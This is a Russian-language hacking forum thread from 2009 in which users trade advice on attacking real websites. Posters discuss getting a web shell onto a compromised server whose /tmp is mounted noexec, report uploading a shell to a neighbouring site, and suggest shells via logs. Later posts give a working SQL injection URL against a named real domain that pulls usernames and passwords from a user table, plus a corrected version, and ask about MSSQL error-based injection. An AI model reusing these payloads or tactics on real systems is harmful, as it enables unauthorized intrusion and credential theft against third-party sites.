
14.11.2009, 17:15
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от geezer.code
bons, а что показывает df и cat /etc/fstab?
df -h:
Код:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
Код:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0
уже отмечал, что места хватает,
смонтирован вроде без особых нюансов
Сообщение от m0Hze
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.
из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Последний раз редактировалось bons; 14.11.2009 в 17:25..
|
|
|

14.11.2009, 18:18
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от bons
df -h:
Код:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
Код:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0
уже отмечал, что места хватает,
смонтирован вроде без особых нюансов
из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Интересная ситуация 
А в других директориях копируеться,создаеться нормально? Таких как /tmp/ и подобные,с привилегией RWD? Тогда я бы искал альтернативу,шелл через логи,через сторонний сайт,поиск других директорий,или создание новых 
|
|
|

14.11.2009, 17:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 jokester:
Если зашел под рутом и доступно изменение БД mysql (для того, чтобы изменить права рута, иногда тупо оставляют рут доступ, но у рута (который же может и изменить эти права) отбирают права на некоторые функции) - в этом случае. Как на это влияет safe_mode - честно, не знаю.
PS: Сорри, читаю невнимательно, даже не понял про что речь шла, думал про заливку из phpmyadmin
Последний раз редактировалось Pashkela; 15.11.2009 в 15:42..
|
|
|

14.11.2009, 18:52
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Расскажи плз как можно расставить такие права
на andrew file system такие права можно поставить =)
bons, попробуй в /var/tmp/
|
|
|

14.11.2009, 19:42
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Почему-то, несмотря на то что права на данную папку и все файлы в ней rwxrwxrwx функция php is_writable говорит что прав на запись нет :/
Доп инфо: владелец файлов apache:apache, права у меня: uid=48(apache) gid=48(apache) groups=48(apache)
в общем-то шелл удалось залить на соседний сайт там таких проблем не возникло. Порутать серв не удалось несмотря на то что ядро обновлялось достаточно давно.
Вопрос про права в этой папке остается нерешенным.
|
|
|

14.11.2009, 20:02
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:
К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights
бла бла бла..
|
|
|

14.11.2009, 22:40
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--
|
|
|

14.11.2009, 22:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+
|
|
|

15.11.2009, 18:08
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.
|
|
|

15.11.2009, 21:24
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
есть sqli на mssql,
надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает
Последний раз редактировалось YuNi|[c; 15.11.2009 в 21:28..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|